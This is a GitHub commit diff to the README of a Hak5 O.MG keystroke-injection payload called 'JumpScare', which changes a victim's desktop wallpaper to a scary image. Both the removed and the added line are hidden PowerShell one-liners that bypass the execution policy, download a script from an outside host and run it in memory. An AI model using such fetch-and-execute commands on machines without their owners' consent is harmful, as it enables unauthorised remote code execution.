Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-18 14:13:49 -06:00 committed by GitHub
parent fa8c790d0a
commit ed239e1c37
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -37,7 +37,7 @@ At that point there desktop wallpaper will be changed to the scary image provide
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
``` ```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-JumpScare/JumpScare.ps1?dl=1; invoke-expression $pl powershell -w h -NoP -NonI -Exec Bypass iwr jakoby.lol/0tn | iex
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>